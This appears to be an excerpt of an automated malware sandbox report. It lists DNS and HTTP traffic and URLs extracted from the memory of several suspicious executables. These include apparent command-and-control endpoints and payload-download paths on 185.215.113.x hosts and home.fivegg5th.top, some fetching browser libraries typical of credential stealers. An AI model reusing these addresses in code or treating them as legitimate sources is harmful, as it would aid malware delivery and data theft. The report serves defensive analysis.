Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: shavar.prod.mozaws.net
Source: global traffic	DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warlikedbeliev.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Feb 2025 20:36:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YHQ4m9xATHKn9Pludh0fmuXUy9my89UNo2v5JYj2u7pryhK2kYe%2BGYXQx5%2BOh32bkH57wT7VuD8GkJMD7PVZ3AiUZx%2FBR4xwEuXIwQ%2Bg%2BHO79CMeM4FNyZdFWHc5mkU261r7QW8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90b4bb843eb94239-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Feb 2025 20:37:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpadfq6k1wSnxWUabAB2LBGdlBQCvWsZW6XH8cm4cdHnz5%2BuXA%2FnBWZ1Gooh7hGAbOQesXPwvPZ22SSXxysA9qqcg0vL4mK4rbGrbTNyNAZZgNs4OouLzGBTDKV8skTNFX2yR1g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90b4bd767ac1c341-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Feb 2025 20:37:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zTVYsQPv7qr0WGubrQqisxXUsKi1ijaEWQczpvV3mEUHH7OQmudx2L41Q6qIJqmv4LcAIQmq8Ya4nGyF5PyqwfmH%2FVQdizqAPfZcXb5pDt4LfpKYcn3CPHFjxa92ryJDO%2BxSHdY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90b4bdeca9de8cb9-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Feb 2025 20:38:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N2xmADfwrTtRLSjenf0Fir79CC%2F20zjn7YQ9wttB9UzpW5IKYR9a8UzhXbVAa0srQS%2FEbHFNGBgA2gHvQS9WwfaascyXAdTsH8vHcmduPgsZ%2B6bRVuH%2BFy0q7UJrgYSQa%2BbiNMY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90b4be57ae50188d-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Feb 2025 20:38:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cXn5etebO%2B6dMboLKhoPsmK4gASxZgwu6UIxhvHm4WjwYu9OqakW3IcGpqPiCx9TjR5vfkGvJxkkC3uTDWmumtnz9vD%2F0GOELEhybziDb9GXhAkOOBO2SdgPqAzxkTwY7pVutws%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90b4becaa84642a6-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 01 Feb 2025 20:37:22 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 01 Feb 2025 20:37:24 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: 5f198671b1.exe, 0000000C.00000002.2454320259.0000000000FF5000.00000040.00000001.01000000.00000010.sdmp, 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.css
Source: 5f198671b1.exe, 0000000C.00000002.2454320259.0000000000FF5000.00000040.00000001.01000000.00000010.sdmp, 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.jpg
Source: mshta.exe, 00000026.00000003.2808372125.000001DD7906B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.1
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp, 48b7eec64e.exe, 00000012.00000002.2597406070.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115
Source: 48b7eec64e.exe, 00000012.00000002.2597406070.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, 48b7eec64e.exe, 00000012.00000002.2597406070.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, 48b7eec64e.exe, 00000012.00000002.2597406070.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dll
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dllc
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/mozglue.dll
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/mozglue.dll6
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dll
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/nss3.dll
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/nss3.dllll
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/nss3.dllp
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dll
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/sqlite3.dll
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dllS8
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlls8
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlls9
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, 48b7eec64e.exe, 00000012.00000002.2597406070.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, 48b7eec64e.exe, 00000012.00000002.2597406070.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php
Source: 48b7eec64e.exe, 00000012.00000002.2597406070.0000000000A27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php&
Source: 48b7eec64e.exe, 00000012.00000002.2597406070.0000000000A27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php/
Source: 48b7eec64e.exe, 00000012.00000002.2597406070.0000000000A27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php/Lk
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php1f
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php3
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpBKKKEHDHDGDGCFBKJ
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpD
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpKFCBFHJDHJKECAKEH
Source: 48b7eec64e.exe, 00000012.00000002.2597406070.0000000000A27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpPX
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpUg0
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpc
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpcal
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpeg
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpem
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phper
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpfc
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpigL
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpjson
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpl
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phps
Source: 48b7eec64e.exe, 00000012.00000002.2597406070.0000000000A27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/ws
Source: 48b7eec64e.exe, 00000012.00000002.2597406070.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115c
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://185.215.113.115c4becf79229cb002.phpser
Source: random.exe, 00000000.00000003.1871942861.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2825195677.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2811275260.00000000014B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: random.exe, 00000000.00000003.1871942861.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/7
Source: random.exe, 00000000.00000003.1871942861.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/P
Source: mshta.exe, 00000026.00000003.2778647337.000001E57AF31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: random.exe, 00000000.00000003.1871973605.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe#Q8
Source: random.exe, 00000000.00000003.1871942861.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe4
Source: random.exe, 00000000.00000003.1871942861.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1871973605.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2825195677.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2811275260.00000000014B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: 0436fcd702.exe, 00000010.00000003.2825195677.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2811275260.00000000014B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeH
Source: 0436fcd702.exe, 00000010.00000003.2825195677.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2811275260.00000000014B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exev
Source: mshta.exe, 00000026.00000003.2808372125.000001DD7906B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.1h
Source: freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: random.exe, 00000000.00000003.1755523362.000000000554D000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2456204269.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2558172527.0000000005AB4000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2800851515.000000000562F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: random.exe, 00000000.00000003.1755523362.000000000554D000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2456204269.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2558172527.0000000005AB4000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2800851515.000000000562F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: random.exe, 00000000.00000003.1755523362.000000000554D000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2456204269.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2558172527.0000000005AB4000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2800851515.000000000562F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: random.exe, 00000000.00000003.1755523362.000000000554D000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2456204269.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2558172527.0000000005AB4000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2800851515.000000000562F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: random.exe, 00000000.00000003.1755523362.000000000554D000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2456204269.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2558172527.0000000005AB4000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2800851515.000000000562F000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: random.exe, 00000000.00000003.1755523362.000000000554D000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2456204269.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2558172527.0000000005AB4000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2800851515.000000000562F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: random.exe, 00000000.00000003.1755523362.000000000554D000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2456204269.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2558172527.0000000005AB4000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2800851515.000000000562F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA17
Source: 5f198671b1.exe, 0000000C.00000002.2454320259.0000000000FF5000.00000040.00000001.01000000.00000010.sdmp, 5f198671b1.exe, 0000000C.00000002.2460017332.0000000001A99000.00000004.00000020.00020000.00000000.sdmp, 5f198671b1.exe, 0000000C.00000003.2419752929.0000000001A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA1738232489
Source: 5f198671b1.exe, 0000000C.00000002.2460017332.0000000001A99000.00000004.00000020.00020000.00000000.sdmp, 5f198671b1.exe, 0000000C.00000003.2419752929.0000000001A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA17382324894fd4
Source: 5f198671b1.exe, 0000000C.00000003.2418350885.0000000001AA2000.00000004.00000020.00020000.00000000.sdmp, 5f198671b1.exe, 0000000C.00000002.2460118240.0000000001AA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA1738232489?argument=0
Source: 5f198671b1.exe, 0000000C.00000002.2460017332.0000000001A99000.00000004.00000020.00020000.00000000.sdmp, 5f198671b1.exe, 0000000C.00000003.2419752929.0000000001A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA1738232489fff::3
Source: 5f198671b1.exe, 0000000C.00000002.2454320259.0000000000FF5000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA1738232489http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCo
Source: 5f198671b1.exe, 0000000C.00000002.2454320259.0000000000FF5000.00000040.00000001.01000000.00000010.sdmp, 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: 0436fcd702.exe, 00000017.00000003.2700281129.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2711672150.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
Source: firefox.exe, 00000029.00000003.2756414246.00000245A6B76000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2785519251.00000245A62DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2757120044.00000245A61E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2785519251.00000245A62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2775236891.00000245A6B76000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2768811875.00000245A6BD3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2767698581.00000245A62D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2758090494.00000245A6B76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: random.exe, 00000000.00000003.1755523362.000000000554D000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2456204269.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2558172527.0000000005AB4000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2800851515.000000000562F000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
